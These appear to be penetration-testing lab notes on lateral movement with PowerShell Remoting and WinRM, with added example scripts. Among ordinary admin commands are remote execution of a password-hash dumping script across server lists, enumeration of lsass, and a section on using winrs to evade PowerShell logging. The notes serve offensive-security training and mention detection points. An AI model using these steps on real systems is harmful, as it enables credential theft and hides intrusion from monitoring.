PowerShell Remoting (WinRM)


Rinse and repeat once you compromise another machine: run the exact same enumeration again from the new user's/machine's standpoint, after attempting privesc on it.


PowerShell remoting is enabled by default on Windows Server 2012 and later (with a firewall exception for TCP 5985) and is the recommended way to manage Server Core installations.

On desktop Windows you have to enable remoting yourself, and local admin privileges are required to do that.
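Added example (not from the original notes): checking whether a host answers on WinRM, and enabling remoting on a desktop machine where it is off. The hostname is the one used elsewhere in these notes and is a placeholder; the firewall rule name is the default one Enable-PSRemoting creates.

```powershell
# Added example, not from the original notes. Run from an elevated prompt.
$target = 'dcorp-adminsrv'   # placeholder hostname

# Client-side check: does the remote WinRM service answer at all?
try {
    Test-WSMan -ComputerName $target -ErrorAction Stop | Out-Null
    "WinRM reachable on $target"
} catch {
    "WinRM not reachable on $target : $($_.Exception.Message)"
}

# Local check: is the WinRM service running, and is there an HTTP listener?
Get-Service WinRM | Select-Object Status, StartType
winrm enumerate winrm/config/listener

# Enable remoting on a Windows desktop (needs local admin).
# -Force skips the prompts; -SkipNetworkProfileCheck is required when the
# active network profile is Public, otherwise Enable-PSRemoting refuses.
Enable-PSRemoting -Force -SkipNetworkProfileCheck

# Confirm the inbound firewall exception (TCP 5985) that Enable-PSRemoting adds
Get-NetFirewallRule -Name 'WINRM-HTTP-In-TCP*' | Select-Object Name, Enabled, Profile
```

Test-WSMan only proves the WS-Management endpoint is up; it says nothing about whether your current account is allowed to open a shell there, which is what Enter-PSSession will tell you.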

One-to-One. Interactive. Runs in a stateful, trusted process (wsmprovhost.exe) on the target

Enter-PSSession -ComputerName dcorp-adminsrv
New-PSSession -ComputerName dcorp-adminsrv

Store sessions in variables and connect

$adminsrv = New-PSSession -ComputerName dcorp-adminsrv
$adminsrv
Enter-PSSession -Session $adminsrv

One-to-Many. Known as fan-out remoting; non-interactive. Executes commands and scripts on many machines at once, can be run as a background job (-AsJob), and runs in memory on the targets by default (nothing is written to disk there)

Invoke-Command

Use the -Credential parameter to supply alternate credentials: either a PSCredential object or a username (which prompts for the password)

Invoke-Command -ScriptBlock {Get-Process} -ComputerName (Get-Content <list_of_servers>)
Invoke-Command -FilePath C:\scripts\Get-PassHashes.ps1 -ComputerName (Get-Content <list_of_servers>)

Execute locally loaded functions

Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content <list_of_servers>)

With Arguments

Execute "Stateful" commands on target machines (each plain Invoke-Command gets a fresh runspace; reuse a PSSession with -Session so variables and functions persist between calls)
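Added example (not from the original notes) covering the fan-out cases above in one script: alternate credentials, passing arguments into the remote script block, shipping a locally defined function, and keeping state across calls with a PSSession. The server list path, the user name and the helper function Get-LocalAdminMembers are placeholders/assumptions.

```powershell
# Added example, not from the original notes. Placeholders: server list, account name.
$servers = Get-Content C:\temp\servers.txt          # assumed: one hostname per line
$cred    = Get-Credential 'dcorp\studentuser'       # prompts for the password

# 1. Non-interactive fan-out: the script block runs on every host concurrently.
#    -ThrottleLimit caps parallel connections; -AsJob puts it in the background.
$job = Invoke-Command -ComputerName $servers -Credential $cred -AsJob -ThrottleLimit 8 `
    -ScriptBlock { Get-Process -Name lsass | Select-Object Name, Id, @{n='Host'; e={ $env:COMPUTERNAME }} }
$job | Wait-Job | Receive-Job

# 2. Passing arguments: local variables are NOT visible inside the remote script block.
#    Either bind them with -ArgumentList / param(), or reference them via $using:.
$svcName = 'WinRM'
Invoke-Command -ComputerName $servers -Credential $cred -ArgumentList $svcName `
    -ScriptBlock { param($name) Get-Service -Name $name | Select-Object MachineName, Name, Status }

Invoke-Command -ComputerName $servers -Credential $cred `
    -ScriptBlock { Get-Service -Name $using:svcName | Select-Object MachineName, Name, Status }

# 3. Shipping a locally defined function: ${function:Name} expands to its ScriptBlock,
#    so the body travels inside the WS-Man request and never touches disk on the target.
function Get-LocalAdminMembers {
    # assumed helper: lists members of the local Administrators group
    Get-LocalGroupMember -Group 'Administrators' | Select-Object Name, PrincipalSource
}
Invoke-Command -ComputerName $servers -Credential $cred -ScriptBlock ${function:Get-LocalAdminMembers}

# 4. Stateful execution: without a session $x would be empty on the second call,
#    because each Invoke-Command gets a fresh runspace. A PSSession keeps the runspace.
$sess = New-PSSession -ComputerName $servers[0] -Credential $cred
Invoke-Command -Session $sess -ScriptBlock { $x = Get-Date }
Invoke-Command -Session $sess -ScriptBlock { "Stored earlier in this session: $x" }
Remove-PSSession $sess
```

Results come back as deserialized objects (note the PSComputerName property Invoke-Command adds), so pick the properties you need on the remote side rather than piping live objects around.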

OPSEC Friendly Option - Winrs


PowerShell remoting is subject to system-wide transcription and deep script block logging. winrs uses the same WinRM transport, but on the target the command is spawned by winrshost.exe as cmd.exe rather than inside a PowerShell host, so we can use winrs in place of PSRemoting to stay out of that logging. Caveat: if you launch powershell.exe through winrs, the logging applies again, and the WinRM operational log on the target still records the shell either way
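Added example (not from the original notes): running a native command over WinRM with winrs, the variant that undoes the benefit, and how to check afterwards what the target actually logged. Hostname, user name and password are placeholders.

```powershell
# Added example, not from the original notes. Placeholders: host, user, password.

# Native binary via winrs: on the target this is winrshost.exe -> cmd.exe,
# no PowerShell host involved, so transcription and script block logging
# (event 4104 in Microsoft-Windows-PowerShell/Operational) do not see it.
winrs -r:dcorp-adminsrv -u:dcorp\studentuser -p:Password123! whoami /all

# Same transport, but this spawns powershell.exe, so script block logging
# applies again. This is the case to avoid if logging is the concern.
winrs -r:dcorp-adminsrv -u:dcorp\studentuser -p:Password123! powershell -c Get-Process

# Checks on the target (run locally or over a session):
# 4104 should show nothing new for the first command ...
Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } `
    -MaxEvents 5 -ErrorAction SilentlyContinue |
    Select-Object TimeCreated, @{ n = 'Snippet'; e = { $_.Message.Substring(0, [Math]::Min(80, $_.Message.Length)) } }

# ... while the WinRM operational log still records the incoming shell for both.
Get-WinEvent -LogName 'Microsoft-Windows-WinRM/Operational' -MaxEvents 10 |
    Select-Object TimeCreated, Id, Message
```

Two further things to keep in mind: -p: puts the password on the command line, which process-creation auditing with command-line logging will capture on the client; and the remote cmd.exe itself is still a child of winrshost.exe, an easy parent/child pattern for a detection team to alert on.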
